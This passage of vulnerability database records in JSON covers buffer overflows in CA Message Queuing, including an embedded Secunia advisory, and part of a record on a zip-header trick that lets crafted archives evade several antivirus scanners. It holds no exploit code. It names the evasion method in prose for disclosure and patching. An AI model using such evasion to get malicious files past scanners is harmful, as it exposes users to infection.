"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple buffer overflows in Computer Associates (CA) Message Queuing (CAM / CAFT) 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13 allow remote attackers to execute arbitrary code via unknown vectors. This may allow an attacker to escalate their privileges to SYSTEM level. CA Unicenter Management Portal provides access to enterprise management information and various Unicenter management solutions such as personalized WEB interface. \n\n----------------------------------------------------------------------\n\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\n\n\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\nSicherheit:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Various Products Message Queuing Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA16513\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/16513/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSpoofing, DoS, System access\n\nWHERE:\n\u003eFrom local network\n\nSOFTWARE:\nCA Unicenter TNG 2.x\nhttp://secunia.com/product/3206/\nCA Unicenter Software Delivery 4.x\nhttp://secunia.com/product/5597/\nCA Unicenter Software Delivery 3.x\nhttp://secunia.com/product/5596/\nCA Unicenter Service Level Management 3.x\nhttp://secunia.com/product/5595/\nCA Unicenter Remote Control 6.x\nhttp://secunia.com/product/2622/\nCA Unicenter Performance Management for OpenVMS 2.x\nhttp://secunia.com/product/5573/\nCA Unicenter Network and Systems Management (NSM) Wireless Network\nManagement Option 3.x\nhttp://secunia.com/product/5594/\nCA Unicenter Network and Systems Management (NSM) 3.x\nhttp://secunia.com/product/1683/\nCA Unicenter Management for WebSphere MQ 3.x\nhttp://secunia.com/product/5590/\nCA Unicenter Management for Web Servers 5.x\nhttp://secunia.com/product/5593/\nCA Unicenter Management for Microsoft Exchange 4.x\nhttp://secunia.com/product/5591/\nCA Unicenter Management for Lotus Notes/Domino 4.x\nhttp://secunia.com/product/5592/\nCA Unicenter Jasmine 3.x\nhttp://secunia.com/product/5589/\nCA Unicenter Enterprise Job Manager 1.x\nhttp://secunia.com/product/5588/\nCA Unicenter Data Transport Option 2.x\nhttp://secunia.com/product/5587/\nCA Unicenter Asset Management 4.x\nhttp://secunia.com/product/1682/\nCA Unicenter Asset Management 3.x\nhttp://secunia.com/product/5586/\nCA Unicenter Application Performance Monitor 3.x\nhttp://secunia.com/product/5585/\nCA eTrust Admin 8.x\nhttp://secunia.com/product/5584/\nCA eTrust Admin 2.x\nhttp://secunia.com/product/5583/\nCA CleverPath Predictive Analysis Server 3.x\nhttp://secunia.com/product/5581/\nCA CleverPath Predictive Analysis Server 2.x\nhttp://secunia.com/product/5580/\nCA CleverPath OLAP 5.x\nhttp://secunia.com/product/5578/\nCA CleverPath Enterprise Content Manager (ECM) 3.x\nhttp://secunia.com/product/5579/\nCA CleverPath Aion 10.x\nhttp://secunia.com/product/5582/\nCA BrightStor SAN Manager 11.x\nhttp://secunia.com/product/5576/\nCA BrightStor SAN Manager 1.x\nhttp://secunia.com/product/5575/\nCA BrightStor Portal 11.x\nhttp://secunia.com/product/5577/\nCA Advantage Data Transport 3.x\nhttp://secunia.com/product/5574/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in various products within\nthe CA Message Queuing (CAM / CAFT) software, which can be exploited\nby malicious people to cause a DoS (Denial of Service) or compromise\na vulnerable system. \n\n1) An unspecified error in the CAM service can be exploited to cause\na DoS by sending specially crafted packets to the TCP port. \n\n2) Unspecified boundary errors can be exploited to cause buffer\noverflows by sending specially crafted packets to the service. \n\n3) An error can be exploited to spoof CAFT and execute arbitrary\ncommands with escalated privileges. \n\nThe vulnerabilities affect all versions of the CA Message Queuing\nsoftware prior to versions 1.07 Build 220_13 and 1.11 Build 29_13. \n\nSOLUTION:\nApply patches (see vendor advisory for details). \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by vendor. \n\nORIGINAL ADVISORY:\nComputer Associates:\nhttp://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2668"
},
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "BID",
"id": "14622"
},
{
"db": "VULHUB",
"id": "VHN-13877"
},
{
"db": "PACKETSTORM",
"id": "39503"
}
],
"trust": 2.79
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-13877",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-13877"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "14622",
"trust": 3.6
},
{
"db": "SECUNIA",
"id": "16513",
"trust": 3.4
},
{
"db": "CERT/CC",
"id": "VU#619988",
"trust": 3.3
},
{
"db": "NVD",
"id": "CVE-2005-2668",
"trust": 2.8
},
{
"db": "OSVDB",
"id": "18916",
"trust": 2.5
},
{
"db": "VUPEN",
"id": "ADV-2005-1482",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1014756",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014760",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014761",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014763",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014764",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014765",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014766",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014767",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014768",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014769",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014770",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014771",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014772",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014773",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014774",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014775",
"trust": 0.8
},
{
"db": "BID",
"id": "14623",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "16825",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "83148",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-71327",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-13877",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "39503",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13877"
},
{
"db": "BID",
"id": "14622"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "PACKETSTORM",
"id": "39503"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
},
{
"db": "NVD",
"id": "CVE-2005-2668"
}
]
},
"id": "VAR-200508-0051",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-13877"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-03T22:23:58.632000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "camsecurity_notice",
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp"
},
{
"title": "CA Unicenter CAM Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146854"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2668"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "http://www.securityfocus.com/bid/14622"
},
{
"trust": 2.9,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp"
},
{
"trust": 2.5,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=32919"
},
{
"trust": 2.5,
"url": "http://www.kb.cert.org/vuls/id/619988"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/16513"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/18916"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2005/1482"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/16513/"
},
{
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_faqs.asp"
},
{
"trust": 0.8,
"url": "http://osvdb.org/displayvuln.php?osvdb_id=18916"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014775.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014774.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014773.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014772.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014771.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014770.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014769.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014768.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014767.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014766.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014765.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014764.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014763.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014761.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014760.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014756.html"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14623"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-2668"
},
{
"trust": 0.8,
"url": "http://www.frsirt.com/english/advisories/2005/1482"
},
{
"trust": 0.8,
"url": "http://jvn.jp//cert/jvnvu619988/"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2005-2668"
},
{
"trust": 0.3,
"url": "http://www.designfolks.com.au/karma/cam/"
},
{
"trust": 0.3,
"url": "http://www.ca.com/"
},
{
"trust": 0.3,
"url": "/archive/1/408817"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5586/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5575/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5581/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5574/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5585/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5580/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5595/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5587/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5594/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5591/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5583/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5576/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1682/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5577/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5590/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5582/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_vacancies/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3206/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5596/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2622/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5588/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5578/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5573/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5579/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1683/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5589/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5593/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5592/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5597/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13877"
},
{
"db": "BID",
"id": "14622"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "PACKETSTORM",
"id": "39503"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
},
{
"db": "NVD",
"id": "CVE-2005-2668"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13877"
},
{
"db": "BID",
"id": "14622"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "PACKETSTORM",
"id": "39503"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
},
{
"db": "NVD",
"id": "CVE-2005-2668"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-08-23T00:00:00",
"db": "CERT/CC",
"id": "VU#619988"
},
{
"date": "2005-08-23T00:00:00",
"db": "VULHUB",
"id": "VHN-13877"
},
{
"date": "2005-08-22T00:00:00",
"db": "BID",
"id": "14622"
},
{
"date": "2008-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"date": "2005-08-23T23:30:33",
"db": "PACKETSTORM",
"id": "39503"
},
{
"date": "2005-08-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200508-250"
},
{
"date": "2005-08-23T04:00:00",
"db": "NVD",
"id": "CVE-2005-2668"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-10-21T00:00:00",
"db": "CERT/CC",
"id": "VU#619988"
},
{
"date": "2017-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-13877"
},
{
"date": "2007-11-15T00:37:00",
"db": "BID",
"id": "14622"
},
{
"date": "2008-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200508-250"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2005-2668"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates Message Queuing software vulnerable to buffer overflows",
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
],
"trust": 0.6
}
}
VAR-200501-0012
Vulnerability from variot - Updated: 2025-04-03 22:21RAV antivirus allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Anti-virus software may rely on corrupted headers to determine if a zip archive is valid. As a result, anti-virus software may fail to detect malicious content within a zip archive. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. This issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. Latest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. RAV is an antivirus software. Due to a problem with the processing of zip files in RAV, zip files can bypass antivirus detection
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200501-0012",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux",
"scope": "eq",
"trust": 1.6,
"vendor": "suse",
"version": "9.2"
},
{
"model": "small business suite",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "1.0"
},
{
"model": "puremessage anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "4.6"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.86"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.85"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.84"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.83"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.82"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.81"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.80"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.79"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "antivirus engine",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "4.3.20"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "gentoo",
"version": "1.4"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.5"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.12"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.1.13"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.0_sp2"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.78d"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "4.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "*"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.2"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.13"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.3"
},
{
"model": "for file servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "1.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "5.0"
},
{
"model": "desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.6"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.11"
},
{
"model": "for mail servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.4.2"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.1"
},
{
"model": "archive zip",
"scope": "eq",
"trust": 1.0,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "anti-virus d",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"model": "antivirus rav antivirus for mail servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.4.2"
},
{
"model": "antivirus rav antivirus for file servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "1.0"
},
{
"model": "antivirus rav antivirus desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.6"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "5.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "4.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "3.0"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.013"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.012"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.011"
},
{
"model": "associates inoculateit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.1.13"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.3"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.2"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus sp2",
"scope": "eq",
"trust": 0.3,
